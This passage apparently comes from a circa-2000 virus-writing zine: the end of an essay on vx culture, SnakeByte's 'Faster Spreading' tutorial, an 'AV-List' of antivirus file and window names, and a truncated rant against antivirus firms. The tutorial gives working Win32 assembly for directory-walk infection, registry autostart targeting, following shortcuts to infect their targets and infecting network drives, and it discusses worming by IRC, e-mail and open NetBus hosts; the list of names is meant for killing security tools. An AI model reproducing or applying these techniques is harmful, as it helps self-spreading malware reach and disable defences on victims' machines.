hierarchy in a group is a clear signal of lameness. Newcomers, please notice how the
best groups around have no hierarchy at all. Maybe one guy who centralizes the
material for the zine, and that's all. Every attempt to mimic the real world (a company
for example, with different departments) is condemned to be considered extremely
lame and poorly productive; and I don't even talk about the irony of seeing newcomers in
the underground trying very quickly to imitate the mechanisms of the normal world.
Didn't you come into the vx world in part because it looked different?

That's why everybody laughs when a group creates this peak of extreme ridiculousness,
a "Public Relations" department. It's clearly a way to admit "we have nothing to say, but
anyway, there is a guy in charge of that". It's a way to show everybody your
navel-gazing and egocentric view of the scene, because you think every journalist around
is going to be interested in your new group, you will be submerged by interview
requests, users will ask you about your viruses, you will make the front page of the New
York Times. In your dreams.

- Delicate conclusion

I sometimes think that the Vx scene is mainly composed of boring IRC teens, who don't
really know what life (I mean real life) is all about, who are not interested in
learning, but in posing as some elite lordz of Darkness. It may be partially true, or
partially wrong, depending on how you look at it. Anyway, I don't really care. A minority
of people are interesting enough, as human beings, or coders, or both, and that's the
only important thing, at least for me. I don't care about all the microscopic IRC wars,
the anecdotal group fights, the childish aggressiveness. Maybe that's because I'm a bit old,
but I think I've learned how to filter important things from the background noise. And
not just in the Vx world. Try to do the same, you will see, life is easier.

- Epilogue

People involved in the virus community - I don't like the word "scene", this is not a
theater, and there is nobody looking at us, another navel-gazing deformation of reality,
even in the terms used - always say that it's worsening as the years pass. More and
more script kiddies and fewer and fewer die-hard asm coders who can spend six hours on a
routine just to optimize it by saving two bytes. I don't think it's true. The problem being
that people cannot separate their personal history from the global picture (that's not
limited to the Vx world, of course). If you try to look at it with some distance, you will
see that the vx community looks the same as five or ten years ago. Not in terms of
techniques used, of course, but in terms of personalities. New people pop in, old people
quit, as an eternal cycle. In these two extreme populations, and in the large group of
active vxers which sits in the middle, the proportion between posers who are just driven
by an ego trip (ph33r M3!), and the really interesting guys who want to discover new
techniques or possibilities, even through a long learning process, yes, this proportion
always stays the same through the years. You have stupid old schoolers and stupid
newbies who think they are Elvis, and you have interesting old schoolers and interesting
newbies who want to learn, always. If you're reading this and you think you are part of
the "scene", just think about which category you fit best. But be aware that the image
you have of yourself may not be the image that your Vxer colleagues have of you. If
you're not satisfied with it, think about what you can do to change it and maybe to gain
some respect. I'm not talking just about improving your technical skills. Some
people try to be creative with their limited knowledge (me, for example), others run
websites, publish useful databases, are active collectors, help newcomers by writing
tutorials, code other things than pure viruses, whatever. You can, at last, improve
your behaviour when interacting with other people. In other words: try to be mature.

I will stop here and return to my cave. Hope this helps.

Spanska - 20 September 2000

PS: Post a message in alt.comp.virus if you want to talk about that - I have no mail.
[copyquedalle: steal this text, modify it, sign it with your name, wipe your ass with it, i don't fucking care]
http://kickme.to/Cryptic/
fly.to/alpina

Faster Spreading
or
What to include in your virus to make it spread more effective

by SnakeByte [SnakeByte@kryptocrew.de]

Here we go. Please notice that it is illegal to spread viruses; all of this
information is purely theoretical, or for testing purposes in a controlled
environment.

I have only written one Windows virus so far, so you will see just a few lines
of code here (interesting ones, I think, but maybe not very optimized ;)

The task of a virus is to spread (the payload is just a side-effect).

So we need some tricks (besides infection *g*) to make our virus spread as
fast as possible.

Ok, when a virus arrives on a clean system, it will infect some files, sure.. ;)
But if something goes wrong, we only get a few infected files in the current
directory, and the victim deletes them because he does not like the infected app.. :(

Not very good, so what can we do to avoid this situation?

Here are 6 ideas for what we can do:

1.) Infect as many file types as possible
2.) Try to drop over archives
3.) Parse directories
4.) Use the registry
5.) Follow links
6.) Worming

Ok, let's take a closer look at each of these methods:

1.) Infect as many file types as possible

If you are a macro coder, you should try to infect as many document types that
support macros as possible (DOC, DOT, XLS, PPT, CDR..). The same goes for the
assembler coders: there are a lot of file formats which can be infected in Win32:
PE EXE, SCR (same as PE EXE), DLL, HLP and VxD. Maybe you should try to code a
hybrid which is able to infect binaries on the one hand and macro documents on
the other; this gives you a much higher chance of finding files to infect. In VDat
there is a description of how to infect most file types. I think adding 200-400
bytes to your virus to be able to infect another type is a very good deal. The
more files you infect, the more likely your virus gets around.

2.) Try to drop over archives

Nowadays nearly every file you download somewhere or get sent by someone is
zipped or packed with another archiver (RAR, ACE..). It is possible to infect
the files inside the archives too. It also offers you a little protection against
AV programs, because AVP, for example, did not scan archives by default at the
time of writing (check a scanner's current defaults before relying on that; most
scanners do open archives now). Read Unknown Mnemonix' tutorials about archive
infection for more information about how to do this. So if you infect an archive
you achieve two goals (stupid sentence ;P): it might not get detected, and it is
possible that someone uploads the archive to a website and your virus gets lots
of hits..

3.) Parse directories

Ok, now we infect a lot of files, but they are all still in the same directory,
so we need to change and parse directories. What we should infect nearly always
are the Windows and the system directories, because they contain a lot of files
which are used heavily. Use the GetWindowsDirectory and GetSystemDirectory APIs
to retrieve their names. Then you should parse directories to find more files to
infect. Otherwise we would have infected the current, the Windows and the system
directory, but nothing else, which is not very useful (how often do you DCC a
friend your calc.exe? *g*). There are two directions for directory parsing: up
towards the root (cd .. in DOS), where you will normally not find many files, or
down into the subdirectories, which is what is recommended. This can simply be
done with a FindFirstFile / FindNextFile loop. The current directory is assumed
to be the root of one of the drives. FindFirstFileProc and FindNextFileProc are
procedures that call the matching APIs (I think you will use them several times
anyway). The RandomNR procedure just generates a random number in edx. Note that
the routine is a random walk: it descends into one randomly chosen subdirectory,
and because it jumps instead of calling, it never comes back up to finish the
parent directory.

************************

ParseFolder:
    call InfectCurDir                   ; infect the current directory
    cmp [ebp+InfCounter], 0             ; did we reach the number of files we
    jbe EndParsing                      ; wanted to infect ? then leave

    lea esi, [ebp+Folders]              ; search pattern (see below)
    call FindFirstFileProc              ; stores the search handle in FindHandle
    inc eax                             ; INVALID_HANDLE_VALUE (-1) ? then there
    jz EndParsing                       ; are no entries at all and we return
    dec eax

GetOtherDir:
    mov eax, dword ptr [ebp+WFD_dwFileAttributes]
    and eax, 10h                        ; FILE_ATTRIBUTE_DIRECTORY set ?
    jz NoThisOne                        ; no: get the next entry

    lea esi, [ebp+WFD_szFileName]
    cmp byte ptr [esi], '.'             ; never descend into . or ..
    je NoThisOne

    call RandomNR                       ; random number in edx: if it is 1 we
    dec edx                             ; descend into this directory, otherwise
    jz ParseNewDir                      ; we go on searching

NoThisOne:
    call FindNextFileProc               ; find the next entry
    test eax, eax
    jnz GetOtherDir

EndParseDir2:                           ; close the search handle
    mov eax, dword ptr [ebp+FindHandle]
    push eax
    call dword ptr [ebp+XFindClose]

EndParsing:
    ret

ParseNewDir:                            ; we got a directory, let's change into
                                        ; it and infect it.. *eg*
    mov eax, dword ptr [ebp+FindHandle] ; close the search handle first
    push eax
    call dword ptr [ebp+XFindClose]

    lea esi, [ebp+WFD_szFileName]       ; set the new current directory
    push esi
    call dword ptr [ebp+XSetCurrentDirectoryA]

    jmp ParseFolder                     ; and parse it again ! (a jmp, not a
                                        ; call: the walk only ever goes down
                                        ; one branch and returns to the caller
                                        ; when it bottoms out)

Folders db '*.',0                       ; pattern handed to FindFirstFile ('*'
                                        ; would match every entry, with or
                                        ; without an extension)

************************

4.) Use the registry

The Windows registry also offers us a lot of information about which files or
directories we should infect to be sure that our virus gets activated again and
does not sleep inside some never-used files. You need to load an additional DLL
(ADVAPI32.DLL, through LoadLibrary / GetProcAddress) in your virus, but I think
this is ok. If you can't load the DLL, just jump over the registry routines and
infect fewer files. I think you all know what the Windows registry is, or? For
those who don't: the registry replaces the old .ini files which were used in
older versions of Windows (3.1). Under Win9x the registry is stored in User.dat
and System.dat; on the NT family the hives live under %SystemRoot%\system32\config,
with each user's part in that user's NTUSER.DAT. To view or change the registry
use regedit.exe, which ships with every version of Windows.

The following APIs are necessary to access the registry; they are all exported
by ADVAPI32.DLL:

RegOpenKeyEx     - Opens a registry key
RegCloseKey      - Closes an open key
RegCreateKey     - Creates a key
RegEnumKeyEx     - Enumerates subkeys
RegQueryValueEx  - Retrieves a value
RegEnumValue     - Enumerates values
Ok, let's see some source code for how to get a value from the registry. This
little piece of code gets the Start Menu folder. Note that it opens
HKEY_USERS\.Default: on Win9x without user profiles that is the active user, but
on NT/2000 .Default is the default profile, not the logged-on user, so there you
open HKEY_CURRENT_USER (80000001h) with the subkey starting at Software\... instead.

************************

    lea esi, RegHandle
    push esi                        ; phkResult: receives the opened key
    push 20019h                     ; samDesired = KEY_READ (the original pushed
                                    ; 1F0000h = STANDARD_RIGHTS_ALL, which lacks
                                    ; KEY_QUERY_VALUE and fails on NT)
    push 0h                         ; ulOptions, reserved
    lea esi, SubKey
    push esi                        ; lpSubKey
    push 80000003h                  ; HKEY_USERS
    call RegOpenKeyExA

    test eax, eax                   ; ERROR_SUCCESS is 0; anything else: return
    jnz WeFailed

    ; let's get the value
    lea esi, BufferSize
    push esi                        ; lpcbData: in = buffer size, out = bytes written
    lea esi, Buffer
    push esi                        ; lpData
    lea esi, ValueType
    push esi                        ; lpType: receives REG_SZ, REG_EXPAND_SZ, ...
    push 0                          ; lpReserved
    lea esi, Value
    push esi                        ; lpValueName
    mov eax, RegHandle
    push eax                        ; hKey
    call RegQueryValueExA           ; eax = 0 on success, the path is in Buffer

    mov eax, dword ptr [RegHandle]
    push eax
    call RegCloseKey

WeFailed:
    ret

SubKey     db '.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders',0
Value      db 'Start Menu',0
ValueType  dd 0h                    ; type of the registry value
BufferSize dd 7Fh                   ; size of the buffer in bytes
Buffer     db 7Fh dup (0)

************************

But what can we use the registry for? Ok, let's see some interesting values:

These keys hold the autostarted files:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce

Here are the paths of all installed apps; what about parsing this key? ;)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths

Several standard directories:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup

Shared files (infect them, "two for the price of one" *g*):
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SharedDLLs

Registered help files (if your virus infects them, here you get a whole bunch of them):
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Help

Computer network name (nice value for slow poly):
HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\ComputerName\ComputerName

A list of installed files (vxd, exe, dll, hlp, pif,..):
HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\InstalledFiles

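
A Run value is a command line, not a file name, so before any of the keys above
tells you which file is launched you have to unquote it, expand %VAR%s and find
the file the way the loader would. The following is an added example for this
section, not code from the article or its author: it parses the text layout that
`reg query <key>` prints (assumed here; the sample is constructed, not a real
system dump) and resolves each autostart value to a path, with the file-existence
check injectable so it runs offline. It also shows the unquoted-path ambiguity:
an unquoted "C:\Program Files\..." is tried prefix by prefix, so a C:\Program.exe
would be picked up first.

```python
"""Resolve autostart registry values to the file they actually launch.

Added example, not from the original article. Input is the `reg query` text
layout (assumed): a key line, then "    name    TYPE    data" per value.
"""
import os
import re

AUTOSTART_KEYS = (
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce",
)

# Constructed sample in the `reg query` layout (not real system data).
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    ScanRegistry    REG_SZ    C:\WINDOWS\scanregw.exe /autorun
    SystemTray    REG_SZ    SysTray.Exe
    AVP    REG_EXPAND_SZ    "%ProgramFiles%\AVP\avpcc.exe" /minimize
    Loader    REG_SZ    C:\Program Files\Tool\loader.exe -x

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    Updater    REG_SZ    "C:\My Documents\update.exe" -silent
"""

VALUE_LINE = re.compile(r"^ {4}(?P<name>.+?) {4}(?P<type>REG_[A-Z_]+) {4}(?P<data>.*)$")


def parse_reg_query(text):
    """Yield (key, value_name, value_type, data) for every value line."""
    key = None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            key = line.strip()
            continue
        m = VALUE_LINE.match(line)
        if key and m:
            yield key, m["name"], m["type"], m["data"]


def expand_env(s, env):
    """%VAR% expansion as REG_EXPAND_SZ consumers do it: case-insensitive,
    unknown variables are left untouched."""
    lookup = {k.lower(): v for k, v in env.items()}
    return re.sub(r"%([^%]+)%", lambda m: lookup.get(m[1].lower(), m[0]), s)


def path_candidates(cmdline):
    """File names a CreateProcess-style launcher tries, in order. A quoted head
    is unambiguous; an unquoted head with spaces is tried prefix by prefix
    ("C:\\Program", then "C:\\Program Files\\..."), which is the same ambiguity
    that makes unquoted service paths hijackable."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return [cmdline[1:end if end > 0 else None]]
    parts = cmdline.split(" ")
    return [" ".join(parts[:i]) for i in range(1, len(parts) + 1)]


def resolve_command(cmdline, env, search_dirs, exists=os.path.exists):
    """Return the file an autostart command line launches, or None. `exists`
    is injectable so the logic can run against a constructed file list."""
    for cand in path_candidates(expand_env(cmdline, env)):
        # a bare name is looked up in the search directories (Windows, System)
        names = [cand] if "\\" in cand else [d.rstrip("\\") + "\\" + cand for d in search_dirs]
        for name in names:
            if "." not in name.rsplit("\\", 1)[-1]:     # no extension: .exe is implied
                name += ".exe"
            if exists(name):
                return name
    return None


def autostart_files(text, env, search_dirs, exists=os.path.exists):
    """Map every value under the autostart keys to its resolved file (or None)."""
    return {
        key + "\\" + name: resolve_command(data, env, search_dirs, exists)
        for key, name, _type, data in parse_reg_query(text)
        if key in AUTOSTART_KEYS
    }
```

On a live system you would feed it the real `reg query` output and the real
search path; the injectable `exists` is only there so the resolution logic
can be exercised without a Windows box.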
5.) Follow Links

Windows uses LNK files to create shortcuts for often-used files, so you don't
need to copy an 8 MB file to your desktop. If you find such a link, you should
check whether it points to a file you are able to infect; if so, don't wait and
drop your code over it. This becomes very useful if you parse the Start Menu or
the desktop *eg*

Here is some example code from my Win32.DDoS for how to do this; it does not
work with NT LNK files :( There is also an API we can use for this (the COM
interface IShellLink: load the file through IPersistFile::Load and ask
IShellLink::GetPath for the target), but I never figured it out; I think this
is not that much code, so we can include it.

I assume you retrieved the LNK file with the help of FindFirstFile /
FindNextFile and the information is stored in the WIN32_FIND_DATA structure;
I also assume that the file is mapped and the base address is in MapAddress.

************************
    ; first of all, check the file mark: the HeaderSize field of a
    ; shortcut is 4Ch, i.e. a single 'L' followed by zero bytes

    mov esi, dword ptr [ebp+MapAddress]
    cmp word ptr [esi], 'L'                 ; check for the sign
    jne NoLNK                               ; not a LNK file: close it

    ; sanity check on the file size: I don't think there are any
    ; shortcuts bigger than 1 MB, this is just to be sure (the original
    ; compared against 400h, which is 1 KB and rejects normal shortcuts)

    cmp dword ptr [ebp+WFD_nFileSizeLow], 100000h
    ja NoLNK

    ; esi = last byte of the mapping, ecx = file size; we search from
    ; the end of the file backwards for a valid filename

    mov esi, dword ptr [ebp+MapAddress]
    mov ecx, dword ptr [ebp+WFD_nFileSizeLow]
    xor edx, edx
    lea esi, [esi+ecx-1]                    ; esi+ecx would be one byte past the view

CheckLoop:
    cmp byte ptr [esi], 3Ah                 ; a filename is recognised by the ':' after
    jne LNKSearch                           ; the drive letter, e.g. C:\whatever\blah.exe
    inc edx                                 ; the file holds two such strings; seen from
    cmp edx, 2                              ; the end, the first ':' belongs to the working
    je PointsDetected                       ; directory (path without filename), so we
                                            ; skip it and take the second one
LNKSearch:
    dec esi                                 ; keep searching until we found the colon or
    loop CheckLoop                          ; walked the entire file (size in ecx);
                                            ; I don't want to set up a SEH frame ;)
                                            ; if we end up here, no second ':' was found
NoLNK:
    ret                                     ; return and search more files

PointsDetected:                             ; esi points to the ':' of the drive,
                                            ; now we need to check the name
    cmp byte ptr [esi+1], 0h                ; a bare drive ("C:") instead of a full path ?
    je NoLNK                                ; this happens sometimes with NT/2k shortcut
                                            ; files, so we better avoid them
PointsDetected2:                            ; now search the start of the name
    dec esi                                 ; by looking for a zero byte
    cmp byte ptr [esi], 0h
    je NameDetected
    loop PointsDetected2                    ; ecx still makes sure we don't search too far
    jmp NoLNK                               ; nothing found ? return..

NameDetected:
    inc esi                                 ; esi now points to the name of the file;
                                            ; open it and check if it is something you
                                            ; are able to infect. It's just that easy,
                                            ; but very effective if you do this in the
                                            ; right folders,.. ;)
************************
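
The byte scan above depends on the file holding exactly two colon-bearing
strings in the expected order, and on the strings being ANSI: an NT/2000
shortcut with the IsUnicode flag stores its StringData as UTF-16, and its
extra data blocks (2000 adds a TrackerDataBlock full of GUIDs) can contain a
stray 3Ah anywhere. The proper way is to walk the structures the format
defines. The following is an added example, not code from the article or its
author: a small parser that follows MS-SHLLINK (ShellLinkHeader,
LinkTargetIDList, LinkInfo, StringData), the way forensic LNK tools recover a
target, next to a reimplementation of the article's heuristic for comparison.
The shortcuts it runs on are constructed inline, not real files.

```python
"""Recover a shortcut's target by walking the Shell Link (.lnk) structures.

Added example, not from the original article. Follows MS-SHLLINK; the
sample shortcuts are built inline by build_lnk() for the demonstration.
"""
import struct

HEADER_SIZE = 0x4C
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")   # {00021401-0000-0000-C000-000000000046}
HAS_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
# StringData fields in the order the spec stores them, with their LinkFlags bit
STRING_DATA = (("name", 0x04), ("relative_path", 0x08), ("working_dir", 0x10),
               ("arguments", 0x20), ("icon_location", 0x40))


def _cstr(buf, off):
    """NUL-terminated ANSI string at buf[off]."""
    return buf[off:buf.index(b"\x00", off)].decode("cp1252")


def _wstr(buf, off):
    """NUL-terminated UTF-16LE string at buf[off]."""
    end = off
    while buf[end:end + 2] != b"\x00\x00":
        end += 2
    return buf[off:end].decode("utf-16-le")


def parse_lnk(data):
    """Return the LinkInfo base path plus whatever StringData fields are present."""
    if len(data) < HEADER_SIZE or data[:4] != b"L\x00\x00\x00" or data[4:20] != LINK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    out = {"local_base_path": None, "unicode": bool(flags & IS_UNICODE)}
    pos = HEADER_SIZE
    if flags & HAS_ID_LIST:                                  # skip the PIDL wholesale
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:
        li = pos
        size, hdr, li_flags, _vol, lbp, _net, _sfx = struct.unpack_from("<7I", data, li)
        if li_flags & 0x1:                                   # VolumeIDAndLocalBasePath
            if hdr >= 0x24:                                  # Unicode offsets present
                lbp = struct.unpack_from("<I", data, li + 0x1C)[0]
                out["local_base_path"] = _wstr(data, li + lbp)
            else:
                out["local_base_path"] = _cstr(data, li + lbp)
        pos = li + size
    for key, bit in STRING_DATA:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]       # characters, no terminator
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos + 2:pos + 2 + count * width]
        out[key] = raw.decode("utf-16-le" if width == 2 else "cp1252")
        pos += 2 + count * width
    return out


def article_heuristic(data):
    """The article's byte scan, for comparison: walk back from EOF to the
    second ':' byte, reject a bare drive, walk back to the preceding NUL."""
    i, colons = len(data) - 1, 0
    while i >= 0:
        if data[i] == 0x3A:
            colons += 1
            if colons == 2:
                break
        i -= 1
    if i < 0 or i + 1 >= len(data) or data[i + 1] == 0:
        return None
    j = i - 1
    while j >= 0 and data[j] != 0:
        j -= 1
    return _cstr(data, j + 1) if j >= 0 else None


def build_lnk(target, working_dir=None, unicode=False):
    """Constructed sample: header + LinkInfo (VolumeID, LocalBasePath) +
    StringData (RelativePath, optional WorkingDir) + terminal block."""
    flags = HAS_LINK_INFO | 0x08 | (0x10 if working_dir else 0) | (IS_UNICODE if unicode else 0)
    header = struct.pack("<I16sIIQQQIiIHHII", HEADER_SIZE, LINK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    volume = struct.pack("<4I", 0x11, 3, 0x12345678, 0x10) + b"\x00"   # fixed drive, empty label
    base = target.encode("cp1252") + b"\x00"
    lbp_off = 0x1C + len(volume)
    sfx_off = lbp_off + len(base)
    link_info = struct.pack("<7I", sfx_off + 1, 0x1C, 0x1, 0x1C, lbp_off, 0, sfx_off)
    link_info += volume + base + b"\x00"

    def sd(s):                                               # CountCharacters + String
        return struct.pack("<H", len(s)) + s.encode("utf-16-le" if unicode else "cp1252")

    strings = sd(".\\" + target.rsplit("\\", 1)[-1])
    if working_dir:
        strings += sd(working_dir)
    return header + link_info + strings + struct.pack("<I", 0)
```

Run against the constructed samples, parse_lnk() recovers the target from
both the ANSI and the IsUnicode shortcut, while article_heuristic() only
works when a WorkingDir string happens to be present: without it the second
colon is never found and a valid shortcut is reported as "not a LNK".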

6.) Worming

To make sure you don't stay on a single computer you should try to spread over
networks. One way are IRC worms, which send your virus to other chatting people.
To my mind this is the easiest way to worm around.
Another way is to check all drives and, if you have access to a network drive,
infect some files there.

************************

    push offset Buffer          ; lpBuffer
    push 60h                    ; nBufferLength in characters
    call GetLogicalDriveStrings ; fills Buffer with 'A:\',0,'C:\',0,...,0

    test eax, eax               ; 0: the call failed
    jz StopThis
    cmp eax, 60h                ; larger than the buffer: the return value is the
    ja StopThis                 ; size needed and the buffer was not filled

    lea esi, Buffer

WhatDrive:
    push esi                    ; lpRootPathName, e.g. 'C:\'
    call GetDriveType
    cmp eax, DRIVE_REMOTE       ; is it a network drive ?
    jne NoNetwork

    ; esi still contains the offset of the root dir on the drive
    call infectDrive            ; so we infect it.. ;P

NoNetwork:
    call GetNextZero            ; place esi after the next zero
                                ; (searching from esi onwards)
    cmp byte ptr [esi], 0       ; the list ends with an empty string: done,
    jne WhatDrive               ; otherwise check the type of the next drive
StopThis:
    ret

Buffer db 60h dup (?)           ; 4 bytes per drive plus the final zero, room
                                ; for 23 drives; I don't know many people
                                ; with 20+ drives, so this should be big enough ;)

************************

Another way is, like the 911 dialer does, to scan IP ranges while the user is
online for PCs running NetBus without a password. If you have access, just upload
your virus ;)
Finally, you can worm with the help of e-mail: infect a program and send it
around with Visual Basic Script or with MAPI calls. This is maybe the fastest
and most efficient way of spreading, because the snowball effect is huge. But if
you use VBS and Outlook, please keep in mind that it is bad enough that your
virus only spreads on one OS; if it also relies on two more components (Outlook
Express and the Windows Script Host) it becomes even worse ;)

Hope this little text helps at least some people; I enjoyed writing it, and hope
you do too while reading it... ;)

cu SnakeByte

AV-List 13.07.2000 ( by SnakeByte [ SnakeByte@kryptocrew.de] )

What is the problem with using anti-AV tricks in a virus? Most of those you find
in tutorials are simply outdated (think of the F-Prot loop trick, which is still
used ;). But under Windows you have more possibilities to get rid of the AVs:
you can stop the execution of files (under Win9x and 2k), you can delete files,
you can prevent files from being executed (if you're in ring 0) and you can
close the windows of other applications. So in this little list you find all
you need for that. Keep in mind that file and window names are tied to one
product version, which is why the list needs to be kept current; it is a
snapshot from July 2000.

I looked for such a list because I wanted to know which files are used by the
AVs and which windows we should close to disable them! But I found none,
lucky for you: now I got a CD in my hands with several shareware AVs and I
collected several others on the net (god, I love this flat rate ;), so I took
some spare time and made this little listing.

I only have Win95, so I can only give information about the Win9x versions.
If you have another version of a program which is listed here installed, or
information about a program which is not listed here, please contact me
so I can expand this list and keep it current.

**************************************************************
Anti-Viral Toolkit Pro ( AVP )

Files:
*.avc Virus Database
( The normal EXE files seem to start the _ ones )
_avp32.exe AVP antiviral scanner shell
_avpcc.exe AVP Control Centre Application
_avpm.exe AVP Monitor
avp32.exe AVP Scanner ( Main File )
avpcc.exe AVP Control Centre Application
avpm.exe AVP Monitor
avpdos32.exe AVP Scanner for DOS
avptc32.exe AVP Scanner for DOS
exec.exe unknown
avpupd.exe AVP Update ( leeches new *.avc files )

Window names:
AVP Monitor
AntiViral Toolkit Pro
AVP Updates

**************************************************************
AntiVir 9x

Files:
Antivir.vdf Virus Database
AVE32.exe Scanner ( DOS )
Avgctrl.exe Monitor
Avnt.exe Scanner ( DOS )
Avrep32.exe Report Viewer
AVSCHED32.exe Scan Scheduler
AVWIN95.exe Scanner
Avwupd32.exe Update

Window names:
H+BEDV AntiVir Guard/9x
AVWUPD32

**************************************************************
Dr. Solomon Virus Scan

Files:
scan.dat Virus Database ( assumed )
AVConsol.exe Scheduler
Bootscan.exe MBR-Scanner ( DOS )
ECEngine.exe Download Engine
FindViru.exe Scanner ( DOS )
scan32.exe Scanner
scrscan.exe ScreenSaver + Scanner
VSCAN40.exe Desktop for the Scanner
vshwin32.exe Monitor
Webscanx.exe Webscanner

Window names:
vsstat
Avconsol
Webscanx
Vshwin

**************************************************************
F-Prot for Windows

Files:
*.def Virus Database
Expert.exe Help & Information ( DOS )
FP-Win.exe Scanner
f-stopw.exe Monitor
Vir-help.exe Help-File ( DOS )

Window names:
FP-WIN
F-PROT für Windows ( German Version )
F-STOPW Version 5.06c

**************************************************************
F-Prot 3.07B

Files:
*.def Virus Database
F-prot.exe Scanner ( DOS )

**************************************************************
F-Secure Anti-Virus for Windows 95

Files:
*.avc Virus Database ( uses same as AVP ! )
DVP95.exe F-Secure Gatekeeper
DVP95_0.exe F-Secure Gatekeeper
F-agnt95.exe F-Agent
F-prot95.exe F-Secure Anti-Virus Launcher

Window names:
F-Secure Anti-Virus for Windows 95
F-Secure Anti-Virus
F-agnt95
Dvp95

**************************************************************
G-Data AntiVirenKit ( German Program )

Files:
*.avc Virus Database ( Same as AVP ! )
AvkServ.exe Scan Server
AckWin32.exe Scanner
notstart.exe creates Bootdisks

Window names:
AntiVirenKit 9

**************************************************************
InoculateIT Personal Edition:

Files:
Vet95.exe Scanner
VetTray.exe Monitor
AutoDown.exe Update
Rescue.exe Dos-Scanner

Window names:
InoculateIT Personal Edition
InoculateIT Real-Time Protection Status
vettray
AutoDownload

**************************************************************
Norman Virus Control Win 9x

Files:
Claw95.exe Monitor
Claw95cf.exe Configures Monitor
Normist.exe Smart Behaviour Blocker
Nvc95.exe Scanner
Nupgrade.exe Internet Upgrade
NVCbin.def Virus Database
NVCMacro.def Virus Database

Window names:
Norman Virus Control for Windows 95/98
Cat's Claw v4.80

**************************************************************
Norton Anti Virus ( NAV )

Files:
navapw32.exe Monitor
NavLu32.exe Update
Navw32.exe Scanner

Window names:
navpw32
Norton AntiVirus

**************************************************************
Sophos Anti-Virus for Win95:

Files:
VDL.dat Virus Database ( assumed )
Sweep95.exe Scanner

Window names:
Sophos Anti-Virus - SWEEP

**************************************************************
Trend PC-Cillin 98

Files:
IOMon98.exe Monitor
PCCWin98.exe Scanner

Window names:
Trend PC-cillin 98
Iomon98

**************************************************************
RAV 7

Files:
*.vdm Virus Database
Jedi.exe Scan Scheduler
Monitor.exe Monitor
rav7win.exe Scanner
rav7.exe Scanner ( DOS )

##############################################################
Are Anti-Virus Companies Criminals?

SnakeByte

Hi, maybe you are wondering about this headline, but I will tell you some facts which
brought me to this question ;)

The first thing is that in several countries there is a law against the ownership of viral
source code and binaries. But this also implies that it is forbidden to share these
things. What do AVers do? They share their files so they are all able to include common
viruses in their databases. In addition to this, they have a lot of viral binaries and
disassemblies in their labs to analyze viruses.

The next fact is not related to a country-specific law, but to international copyright. Most
of the software for MS-DOS and Windows (which are the favourite platforms for viruses) is
commercial. What does this mean? You have to pay for the software you use. If you copy it
completely, or parts of it, without paying for the code, you break international copyright
law. Heh, what do Kaspersky and the others ask me for? I shall send them files which I
suspect to be infected? I can't believe this, they ask me to commit a crime! I don't know
how other countries handle this, but here in Germany, if you make another person commit a
crime it is nearly as bad as committing the crime yourself.

Last time I installed something commercial on my PC, I was so bored, that I read the
disclaimer ( you know the window with lots of text you normally just see for a short time,
cause you directly press >next< ). I was wondering when I saw the little paragraph about
reverse engineering. If you own this program, you agree to the terms, that you will never
ever reverse this program. ( If you don't own the program you break the copyright I talked
few lines above about *g* ). Heh, how do the Anti-Virus researchers analyze viruses ? They
reverse the virus, to get knownlegde about how the virus works. Whoah, to do this, they also
need to disasm the infected program. Another law they break. I really don't think that they
just start the file to infect some goats, if they would, they get in danger that new
hardware attacks destroy their systems ;)

Another thing is that several Anti-Virus Companies start to work on Scanners, which work on
mail-servers to stop outgoing viruses. The mail will not be delivered. Due to the fact, that
a most virus scanners can scan compressed files and so on, there is no easy way for a normal
user to send a virus to his favourite AV Company, if the webserver he uses has one of these
scanners running and the scanner has the virus inside its database. Ok, why is this so
criminal ? They exclude smaller AV-Companies by this from the market. I for myself write a
simple, free Anti-Trojan Tool. How should I receive submissions from peoples which want tu
support my work ? It is impossible and therefore I can not longer work on my product. By
this, they use their nearly-monopol like place to get rid of concurrents. This is illegal,
as you see on the current proceedings against Microsoft.

What if we consider viruses to be an art ? In a way the author created something unique,
which may be assumed to be an artwork like a book or a painting ( If you look at abstract
artwork, nearly everything may be considered to be art *g* ) What about the destruction of
art ? Nearly everywhere this is illegal or at least against the ethics ( Just think about
the burning of books by the germans during the WW2 ) So this might be another crime they
